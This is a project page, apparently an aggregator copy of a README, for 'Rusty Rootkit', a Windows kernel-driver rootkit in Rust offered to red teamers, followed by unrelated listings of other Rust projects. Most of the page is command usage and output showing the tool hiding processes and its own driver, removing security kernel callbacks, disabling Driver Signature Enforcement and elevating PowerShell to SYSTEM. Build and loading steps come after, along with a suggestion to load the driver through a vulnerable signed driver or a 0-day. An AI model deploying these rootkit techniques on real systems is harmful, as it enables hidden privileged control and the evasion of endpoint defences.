Rusty Rootkit: Windows Kernel Driver in Rust for Red Teamers

Related tags

Utilities eagle-rs
Overview

Windows Kernel Driver in Rust (Rusty Rootkit) for Red Teamers

Features (Development in progress)

  • Protect / unprotect process (Done)
  • Elevate to NT AUTHORITY\SYSTEM and Enable all token privileges (Done)
  • Hide process (Done)
  • Hide driver (Done)
  • Enumerate loaded kernel modules (Done)
  • Enumerate / remove kernel callbacks
    • PsSetCreateProcessNotifyRoutine (Done)
    • PsSetCreateThreadNotifyRoutine (Todo)
    • PsSetLoadImageNotifyRoutine (Todo)
    • CmRegisterCallbackEx (Todo)
    • ObRegisterCallbacks (Todo)
  • DSE enable/disable (Done)

Usage

PS C:\Users\memn0ps\Desktop> .\client.exe -h
client 0.1.0

USAGE:
    client.exe <SUBCOMMAND>

OPTIONS:
    -h, --help       Print help information
    -V, --version    Print version information

SUBCOMMANDS:
    callbacks
    driver
    dse
    help         Print this message or the help of the given subcommand(s)
    process
client.exe-process

USAGE:
    client.exe process --name <PROCESS> <--protect|--unprotect|--elevate|--hide>

OPTIONS:
    -e, --elevate           Elevate all token privileges
    -h, --help              Print help information
        --hide              Hide a process using Direct Kernel Object Manipulation (DKOM)
    -n, --name <PROCESS>    Target process name
    -p, --protect           Protect a process
    -u, --unprotect         Unprotect a process
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks -h
client.exe-callbacks

USAGE:
    client.exe callbacks <--enumerate|--patch <PATCH>>

OPTIONS:
    -e, --enumerate        Enumerate kernel callbacks
    -h, --help             Print help information
    -p, --patch <PATCH>    Patch kernel callbacks 0-63
PS C:\Users\memn0ps\Desktop> .\client.exe dse -h
client.exe-dse

USAGE:
    client.exe dse <--enable|--disable>

OPTIONS:
    -d, --disable    Disable Driver Signature Enforcement (DSE)
    -e, --enable     Enable Driver Signature Enforcement (DSE)
    -h, --help       Print help information
PS C:\Users\memn0ps\Desktop> .\client.exe driver -h
client.exe-driver

USAGE:
    client.exe driver <--hide|--enumerate>

OPTIONS:
    -e, --enumerate    Enumerate loaded kernel modules
    -h, --help         Print help information
        --hide         Hide a driver using Direct Kernel Object Manipulation (DKOM)

Enumerate and Patch Kernel Callbacks

PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --enumerate
Total Kernel Callbacks: 11
[0] 0xffffbd8d3d2502df ("ntoskrnl.exe")
[1] 0xffffbd8d3d2fe81f ("cng.sys")
[2] 0xffffbd8d3db2bc8f ("WdFilter.sys")
[3] 0xffffbd8d3db2bf8f ("ksecdd.sys")
[4] 0xffffbd8d3db2c0df ("tcpip.sys")
[5] 0xffffbd8d3f10705f ("iorate.sys")
[6] 0xffffbd8d3f10765f ("CI.dll")
[7] 0xffffbd8d3f10789f ("dxgkrnl.sys")
[8] 0xffffbd8d3fa37cff ("vm3dmp.sys")
[9] 0xffffbd8d3f97104f ("peauth.sys")
[10] 0xffffbd8d43afb63f ("Eagle.sys")
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --patch 10
[+] Callback patched successfully at index 10
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --enumerate
Total Kernel Callbacks: 10
[0] 0xffffbd8d3d2502df ("ntoskrnl.exe")
[1] 0xffffbd8d3d2fe81f ("cng.sys")
[2] 0xffffbd8d3db2bc8f ("WdFilter.sys")
[3] 0xffffbd8d3db2bf8f ("ksecdd.sys")
[4] 0xffffbd8d3db2c0df ("tcpip.sys")
[5] 0xffffbd8d3f10705f ("iorate.sys")
[6] 0xffffbd8d3f10765f ("CI.dll")
[7] 0xffffbd8d3f10789f ("dxgkrnl.sys")
[8] 0xffffbd8d3fa37cff ("vm3dmp.sys")
[9] 0xffffbd8d3f97104f ("peauth.sys")

Protect Process

PS C:\Users\memn0ps\Desktop> .\client.exe process --name notepad.exe --protect
[+] Process protected successfully 8248

Protect

Elevate to NT AUTHORITY\System and Enable All Token Privileges

PS C:\Users\memn0ps\Desktop> whoami /all

USER INFORMATION

================== ==============================================
windows-10-vm\user S-1-5-21-3694103140-4081734440-3706941413-1001


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Performance Log Users                                 Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
PS C:\Users\memn0ps\Desktop> .\client.exe process --name powershell.exe --elevate
[+] Tokens privileges elevated successfully 6376
PS C:\Users\memn0ps\Desktop> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

PS C:\Users\memn0ps\Desktop>

Enable / Disable Driver Signature Enforcement (DSE)

PS C:\Users\memn0ps\Desktop> .\client.exe dse --enable
Bytes returned: 16
[+] Driver Signature Enforcement (DSE) enabled: 0x6
0: kd> db 0xfffff8005a6683b8 L1
fffff800`5a6683b8  06 
PS C:\Users\memn0ps\Desktop> .\client.exe dse --disable
Bytes returned: 16
[+] Driver Signature Enforcement (DSE) disabled: 0xe
0: kd> db 0xfffff8005a6683b8 L1
fffff800`5a6683b8  0e

Hide Process

CMD

PS C:\Users\memn0ps\Desktop> .\client.exe process --name powershell.exe --hide
[+] Process is hidden successfully: 6376

CMD

Hide Driver

Hidden from ZwQuerySystemInformation and PsLoadedModuleList

PS C:\Users\memn0ps\Desktop> .\client.exe driver --enumerate
Total Number of Modules: 185
[0] 0xfffff80058c00000 "ntoskrnl.exe"
[1] 0xfffff80054d20000 "hal.dll"
<..OMITTED..>
[180] 0xfffff80054600000 "KERNEL32.dll"
[181] 0xfffff80054200000 "ntdll.dll"
[182] 0xfffff800553f0000 "KERNELBASE.dll"
[183] 0xfffff800556f0000 "MpKslDrv.sys"
[184] 0xfffff80055720000 "Eagle.sys"
[+] Loaded modules enumerated successfully
PS C:\Users\memn0ps\Desktop> .\client.exe driver --hide
[+] Driver hidden successfully
PS C:\Users\memn0ps\Desktop> .\client.exe driver --enumerate
Total Number of Modules: 184
[0] 0xfffff80058c00000 "ntoskrnl.exe"
[1] 0xfffff80054d20000 "hal.dll"
<..OMITTED..>
[180] 0xfffff80054600000 "KERNEL32.dll"
[181] 0xfffff80054200000 "ntdll.dll"
[182] 0xfffff800553f0000 "KERNELBASE.dll"
[183] 0xfffff800556f0000 "MpKslDrv.sys"
[+] Loaded modules enumerated successfully

Install Rust

To start using Rust, download the installer, then run the program and follow the onscreen instructions. You may need to install the Visual Studio C++ Build tools when prompted to do so.

Install

Install and change to Rust nightly

rustup toolchain install nightly
rustup default nightly

Install cargo-make

Install cargo-make

cargo install cargo-make

Install WDK/SDK

  • Step 1: Install Visual Studio 2019
  • Step 2: Install Windows 11 SDK (22000.1)
  • Step 3: Install Windows 11 WDK

Build Driver

Change directory to .\driver\ and build driver

cargo make sign

Build Client

Change directory to .\client\ and build client

cargo build

Enable Test Mode or Test Signing Mode

bcdedit /set testsigning on

[Optional] Debug via Windbg

bcdedit /debug on
bcdedit /dbgsettings net hostip:<IP> port:<PORT>

Create / Start Service

You can use Service Control Manager or OSR Driver Loader to load your driver.

PS C:\Users\memn0ps> sc.exe create Eagle type= kernel binPath= C:\Windows\System32\Eagle.sys
[SC] CreateService SUCCESS
PS C:\Users\memn0ps> sc.exe query Eagle

SERVICE_NAME: Eagle
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
PS C:\Users\memn0ps> sc.exe start Eagle

SERVICE_NAME: Eagle
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 0
        FLAGS              :
PS C:\Users\memn0ps> sc.exe stop Eagle

SERVICE_NAME: Eagle
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Currently, this driver does not support manual mapping. However, an alternative way to load your driver is to manually map it by exploiting an existing CVE in a signed driver that is already loaded such as Intel or Capcom, although vulnerable drivers can be flagged easily by EDRs or ACs.

Otherwise you can always get an extended validation (EV) code signing certificate by Microsoft which goes through a "vetting" process or use a 0-day which is really up to you lol.

Note

A better way to code Windows Kernel Drivers in Rust is to create bindings as shown in the references below. However, using someone else's bindings hides the functionality and this is why I made it the classic way unless, of course, you create your own bindings. I plan on refactoring the code in the future but for now, it will be a bit messy and incomplete.

I made this project for fun and because I really like Rust and Windows Internals. This is obviously not perfect or finished yet. if you would like to learn more about Windows Kernel Programming then feel free to check out the references below. The prefered safe and robust way of coding Windows Kernel Drivers in Rust is shown here:

References and Credits

You might also like...
A lite tool to make systemd work in any container(Windows Subsystem for Linux 2, Docker, Podman, etc.)

Angea Naming from hydrangea(アジサイ) A lite tool to make systemd work in any container(Windows Subsystem for Linux 2, Docker, Podman, etc.) WSL1 is not s

Helps positioning your tauri windows.

Tauri plugin positioner A plugin for tauri that helps positioning you windows at well known locations. Install Rust [dependencies] tauri-plugin-positi

🔮 ChatGPT Desktop Application (Mac, Windows and Linux)
🔮 ChatGPT Desktop Application (Mac, Windows and Linux)

ChatGPT ChatGPT Desktop Application 📦 Install 📝 Update Log 🕒 History versions... Windows From our github releases: ChatGPT_0.7.4_x64_en-US.msi Or i

Web-wrapped Supabase desktop app for macOS, Windows & Linux powered by Tauri
Web-wrapped Supabase desktop app for macOS, Windows & Linux powered by Tauri

Supabase Desktop App What is it? It's a cross-platform web-wrapped Supabase desktop app powered by Tauri. You can install it on your macOS, Windows (u

NewBin Desktop Application (Mac, Windows and Linux)
NewBin Desktop Application (Mac, Windows and Linux)

NewBing NewBing Desktop Application (Windows Mac Linux) Install Windows NewBing_0.0.1_x64_en-US.msi Mac NewBing_0.0.1_x64.dmg Usage Recommended Rust (

OpenAI chat client desktop app (Windows, MacOS, Linux)
OpenAI chat client desktop app (Windows, MacOS, Linux)

ChatWizard OpenAI chat client Desktop Application (Windows, MacOS, Linux) Declaration This project is currently undergoing active development and has

An open-source Windows client for Twitch.tv
An open-source Windows client for Twitch.tv

TwitchBox is a lightweight Windows client created to enhance the Twitch.tv experience. The app uses the Tauri framework, which includes a combination

k-mer counter in Rust using the rust-bio and rayon crates

krust is a k-mer counter written in Rust and run from the command line that will output canonical k-mers and their frequency across the records in a f

Experimental Rust tool for generating FFI definitions allowing many other languages to call Rust code

Diplomat is an experimental Rust tool for generating FFI definitions allowing many other languages to call Rust code. With Diplomat, you can simply define Rust APIs to be exposed over FFI and get high-level C, C++, and JavaScript bindings automatically!

Owner
Rusty Rustacean
null
Rustymind is a driver and parser for NeuroSky MindWave EEG headset written in pure Rust.

Rustymind is a driver and parser for NeuroSky MindWave EEG headset written in pure Rust. You can use it to connect, interact, and plot real time data from the headset.

Junjun Dong 34 Sep 13, 2022
TI LDC1312/LDC1314/LDC1612/LDC1614 inductance-to-digital converter driver for Rust embedded-hal

ldc1x1x Rust embedded-hal 1.x driver for Texas Instruments (TI) I²C inductance-to-digital converters (LDC): LDC1312/LDC1314, LDC1612/LDC1614. Includes

null 2 Oct 2, 2022
RDFM - The Rusty DotFiles Manager

d8888b. d88888b. 8888888b 8888b d8888 88 `8D 88 `8D 88' 88'YbdP`88 88oobY' 88 88

Wafelack 40 Aug 14, 2022
Rusty NuGet client

turron It's a NuGet client built in Rust. It's not really meant to replace existing nuget clients. It's more of a playground for experimenting with re

Kat Marchán 18 Feb 2, 2022
Rusty Armor Builds - Monster Hunter Rise Armor Set Creation Tool

RAB Rusty Armor Builds - Monster Hunter Rise Armor Set Creation Tool Armor files used by RAB

null 28 Oct 3, 2022
An embedded-hal driver for the TT21100 multi-touch touchscreen controller

tt21100 An embedded-hal driver for the TT21100 multi-touch touchscreen controller. If there is a feature which has not yet been implemented and which

Jesse Braham 5 Jan 9, 2023
A rewrite of Phonelink for Windows Forms written in Rust, with cross-platform support.

phonelink-rs A rewrite of Phonelink for Windows Forms written in Rust, with cross-platform support. Usage Clone the repository and build, or download

ahsan-a 4 Aug 6, 2022
OpenAI ChatGPT desktop app for Mac, Windows, & Linux menubar using Tauri & Rust

ChatGPT Desktop App Unofficial open source OpenAI ChatGPT desktop app for mac, windows, and linux menubar using tauri & rust. Downloads Windows (2.7 M

Sonny Lazuardi 732 Jan 5, 2023
Rust program to monitor Windows 10 Registry keys for changes or modifications.

RegMon This Rust program monitors changes to multiple registry keys in Windows 10 and writes the changes to a text file. It also periodically sends a

0x44F 3 Jan 16, 2023
A tiling window manager for Windows 10 based on binary space partitioning

yatta BSP Tiling Window Manager for Windows 10 Getting Started This project is still heavily under development and there are no prebuilt binaries avai

Jade 143 Nov 12, 2022